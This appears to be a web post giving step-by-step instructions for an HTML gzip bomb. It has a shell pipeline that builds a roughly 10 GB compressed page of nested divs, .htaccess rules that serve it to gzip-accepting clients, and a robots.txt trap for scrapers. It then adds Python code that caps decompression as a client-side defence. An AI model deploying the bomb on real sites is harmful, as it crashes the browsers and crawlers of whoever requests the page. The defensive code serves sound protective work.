HTML zip bomb

(
  echo '<!doctype html><meta charset=utf-8><body><title>BOOM!</title>'
  yes '<div></div>'
) \
| dd bs=1M count="10240" iflag=fullblock \
| gzip -n > bomb.html.gz

Creates a ~10GB HTML file with billions of nested <div>'s.

A fallback page (bomb.html) that will be displayed if gzip compression is not enabled:

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Gzip Bomb Notice</title>
</head>
<body>
<p>This file is a gzip bomb. Do not decompress unless you know what you are doing.</p>
</body>
</html>

Put both bomb.html and bomb.html.gz in the root folder.

.htaccess settings:

# GZIP BOMB
<IfModule mod_rewrite.c>
RewriteEngine On

# ---- Gzip static ----
# If client accepts gzip and bomb.html.gz exists → serve it
RewriteCond %{REQUEST_URI} ^/bomb\.html$
RewriteCond %{HTTP:Accept-Encoding} gzip
RewriteCond %{DOCUMENT_ROOT}/bomb.html.gz -f
RewriteRule ^bomb\.html$ /bomb.html.gz [L]
</IfModule>

# Tell Apache what these files are
AddType text/html .html.gz
AddEncoding gzip .gz
AddEncoding br .br

# Prevent Apache from double-compressing
<IfModule mod_deflate.c>
SetEnvIfNoCase Request_URI \.gz$ no-gzip
</IfModule>

# Cache rules similar to gzip_proxied (optional)
<FilesMatch "(bomb\.html(\.gz)?)$">
  Header append Vary Accept-Encoding
</FilesMatch>

Options -MultiViews

Add to robots.txt

User-agent: *
Disallow: /bomb.html
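
Seen from the receiving side, a client or crawler that sends Accept-Encoding: gzip can cap how much of such a body it inflates. The following Python code is an added example, not part of the original post; bounded_gunzip, make_sample_bomb, iter_chunks and the 1 MiB budget are assumptions for illustration, and the sample is a constructed 8 MiB stand-in for bomb.html.gz.

```python
import gzip
import io
import zlib

class DecompressionLimitExceeded(Exception):
    """The gzip body inflated past the caller's output budget."""

def bounded_gunzip(chunks, max_output=1 << 20, step=64 * 1024):
    """Inflate gzip-encoded chunks, giving up once max_output bytes exist."""
    d = zlib.decompressobj(wbits=16 + zlib.MAX_WBITS)  # 16+ means gzip framing
    out = bytearray()
    for chunk in chunks:
        data = chunk
        while data:
            # max_length=step caps each call's output; input that was not
            # inflated yet is returned in unconsumed_tail, still compressed.
            out += d.decompress(data, step)
            if len(out) > max_output:
                raise DecompressionLimitExceeded(f"over {max_output} bytes inflated")
            data = d.unconsumed_tail
        if d.eof:
            break
    out += d.flush()  # at most a few pending bytes; the tail is empty here
    if len(out) > max_output:
        raise DecompressionLimitExceeded(f"over {max_output} bytes inflated")
    if not d.eof:
        raise ValueError("truncated gzip stream")
    return bytes(out)

HEADER = b"<!doctype html><meta charset=utf-8><body><title>BOOM!</title>\n"
LINE = b"<div></div>\n"

def make_sample_bomb(plain_size=8 * 1024 * 1024):
    """Constructed sample: same content as the page's pipeline, only 8 MiB."""
    buf = io.BytesIO()
    with gzip.GzipFile(fileobj=buf, mode="wb", mtime=0) as gz:
        gz.write(HEADER)
        gz.write(LINE * (plain_size // len(LINE)))
    return buf.getvalue()

def iter_chunks(blob, size=4096):
    return (blob[i:i + size] for i in range(0, len(blob), size))

if __name__ == "__main__":
    bomb = make_sample_bomb()
    try:
        bounded_gunzip(iter_chunks(bomb))
    except DecompressionLimitExceeded as exc:
        print(f"{len(bomb)} compressed bytes, aborted: {exc}")
```

Peak memory stays near max_output plus one step, because the unread remainder of each chunk is held in compressed form until it is needed.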